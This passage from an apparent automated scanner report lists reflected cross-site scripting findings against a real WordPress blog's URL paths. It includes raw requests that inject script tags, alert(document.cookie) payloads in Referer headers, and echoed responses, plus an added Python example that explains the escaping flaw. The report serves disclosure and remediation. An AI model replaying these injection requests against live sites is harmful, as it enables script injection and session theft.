Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-postviews/wp-postviews.php

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c795"><script>alert(1)</script>100e771e126 was submitted in the REST URL parameter 5. This input was echoed as 8c795\"><script>alert(1)</script>100e771e126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/wp-postviews/wp-postviews.php8c795"><script>alert(1)</script>100e771e126?_=1297258312289&postviews_id=2456 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Last-Modified: Wed, 09 Feb 2011 13:31:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins/wp-postviews/wp-postviews.php8c795\"><script>alert(1)</script>100e771e126?_=1297258312289&postviews_id=2456"/>
...[SNIP]...

1.38. http://addyosmani.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d6b1"><script>alert(1)</script>9be0c96d337 was submitted in the REST URL parameter 2. This input was echoed as 1d6b1\"><script>alert(1)</script>9be0c96d337 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes1d6b1"><script>alert(1)</script>9be0c96d337/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:10 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes1d6b1\"><script>alert(1)</script>9be0c96d337/js/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

1.39. http://addyosmani.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0d40"><script>alert(1)</script>8b758a4062c was submitted in the REST URL parameter 3. This input was echoed as b0d40\"><script>alert(1)</script>8b758a4062c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/jsb0d40"><script>alert(1)</script>8b758a4062c/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:13 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/jsb0d40\"><script>alert(1)</script>8b758a4062c/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

1.40. http://addyosmani.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88f4"><script>alert(1)</script>a4e75e6aa52 was submitted in the REST URL parameter 4. This input was echoed as a88f4\"><script>alert(1)</script>a4e75e6aa52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/jquerya88f4"><script>alert(1)</script>a4e75e6aa52/jquery.js?ver=1.4.2 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/jquerya88f4\"><script>alert(1)</script>a4e75e6aa52/jquery.js?ver=1.4.2"/>
...[SNIP]...

1.41. http://addyosmani.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcff"><script>alert(1)</script>efa9d4c1a8b was submitted in the REST URL parameter 5. This input was echoed as 4bcff\"><script>alert(1)</script>efa9d4c1a8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/jquery/jquery.js4bcff"><script>alert(1)</script>efa9d4c1a8b?ver=1.4.2 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/jquery/jquery.js4bcff\"><script>alert(1)</script>efa9d4c1a8b?ver=1.4.2"/>
...[SNIP]...
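
The backslash in the echoed value is worth dwelling on, because it is the wrong fix for the context. The Python example below is added here and is not part of the crawler report or of the site's own code. It rebuilds the og:url meta tag from finding 1.41 two ways: with addslashes-style backslash escaping (an assumption about what the site applied, chosen because it reproduces the observed \" exactly) and with HTML attribute encoding. Both results are then run through Python's HTML tokenizer to show which one yields a script start tag.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the payload the crawler submitted in REST URL parameter 5
# (finding 1.41) and the jquery.js path it was appended to.
PAYLOAD = '4bcff"><script>alert(1)</script>efa9d4c1a8b'
REQUEST_PATH = '/blog/wp-includes/js/jquery/jquery.js' + PAYLOAD + '?ver=1.4.2'
ORIGIN = 'http://addyosmani.com'


def addslashes(value: str) -> str:
    """Backslash-escaping in the style of PHP addslashes().

    Assumed here to be what the site applied, because it reproduces the
    backslash seen before the quote in the response. It is only meaningful
    inside a JavaScript or SQL string literal, never inside an HTML attribute.
    """
    return (value.replace('\\', '\\\\')
                 .replace('"', '\\"')
                 .replace("'", "\\'")
                 .replace('\0', '\\0'))


def og_url_meta_vulnerable(path: str) -> str:
    """Builds the og:url meta tag the way the observed response does."""
    return '<meta property="og:url" content="%s"/>' % addslashes(ORIGIN + path)


def og_url_meta_fixed(path: str) -> str:
    """Same tag with context-correct HTML attribute encoding.

    html.escape(quote=True) turns " into &quot; and < > & into entities, so the
    attribute value cannot terminate early whatever the path contains.
    """
    return '<meta property="og:url" content="%s"/>' % html.escape(ORIGIN + path, quote=True)


class TagCollector(HTMLParser):
    """Records every start tag the tokenizer sees, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup: str) -> list[str]:
    """Returns the start tags an HTML parser extracts from a fragment."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == '__main__':
    for label, build in (('vulnerable', og_url_meta_vulnerable), ('fixed', og_url_meta_fixed)):
        markup = build(REQUEST_PATH)
        print(label, start_tags(markup))
        print('   ', markup)
```

The vulnerable build tokenizes as a meta tag followed by a script tag; the fixed build tokenizes as a single meta tag whose content attribute carries the whole payload as inert text.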

1.42. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 629ec"><script>alert(1)</script>cb0b354f1f3 was submitted in the REST URL parameter 2. This input was echoed as 629ec\"><script>alert(1)</script>cb0b354f1f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes629ec"><script>alert(1)</script>cb0b354f1f3/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes629ec\"><script>alert(1)</script>cb0b354f1f3/js/thickbox/thickbox.css?ver=20090514"/>
...[SNIP]...

1.43. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6deeb"><script>alert(1)</script>d5349be6f45 was submitted in the REST URL parameter 3. This input was echoed as 6deeb\"><script>alert(1)</script>d5349be6f45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js6deeb"><script>alert(1)</script>d5349be6f45/thickbox/thickbox.css?ver=20090514 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js6deeb\"><script>alert(1)</script>d5349be6f45/thickbox/thickbox.css?ver=20090514"/>
...[SNIP]...

1.44. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1193"><script>alert(1)</script>3de8dc9ec6e was submitted in the REST URL parameter 4. This input was echoed as a1193\"><script>alert(1)</script>3de8dc9ec6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/thickboxa1193"><script>alert(1)</script>3de8dc9ec6e/thickbox.css?ver=20090514 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:15 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/thickboxa1193\"><script>alert(1)</script>3de8dc9ec6e/thickbox.css?ver=20090514"/>
...[SNIP]...

1.45. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db25"><script>alert(1)</script>d8ede75f171 was submitted in the REST URL parameter 5. This input was echoed as 9db25\"><script>alert(1)</script>d8ede75f171 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/thickbox/thickbox.css9db25"><script>alert(1)</script>d8ede75f171?ver=20090514 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.css9db25\"><script>alert(1)</script>d8ede75f171?ver=20090514"/>
...[SNIP]...

1.46. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 375e4"><script>alert(1)</script>7c7d83dd3d9 was submitted in the REST URL parameter 2. This input was echoed as 375e4\"><script>alert(1)</script>7c7d83dd3d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes375e4"><script>alert(1)</script>7c7d83dd3d9/js/thickbox/thickbox.js?ver=3.1-20100407 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes375e4\"><script>alert(1)</script>7c7d83dd3d9/js/thickbox/thickbox.js?ver=3.1-20100407"/>
...[SNIP]...

1.47. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8c7"><script>alert(1)</script>2f2e85b9e43 was submitted in the REST URL parameter 3. This input was echoed as 4b8c7\"><script>alert(1)</script>2f2e85b9e43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js4b8c7"><script>alert(1)</script>2f2e85b9e43/thickbox/thickbox.js?ver=3.1-20100407 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js4b8c7\"><script>alert(1)</script>2f2e85b9e43/thickbox/thickbox.js?ver=3.1-20100407"/>
...[SNIP]...

1.48. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0283"><script>alert(1)</script>20365640c07 was submitted in the REST URL parameter 4. This input was echoed as f0283\"><script>alert(1)</script>20365640c07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/thickboxf0283"><script>alert(1)</script>20365640c07/thickbox.js?ver=3.1-20100407 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
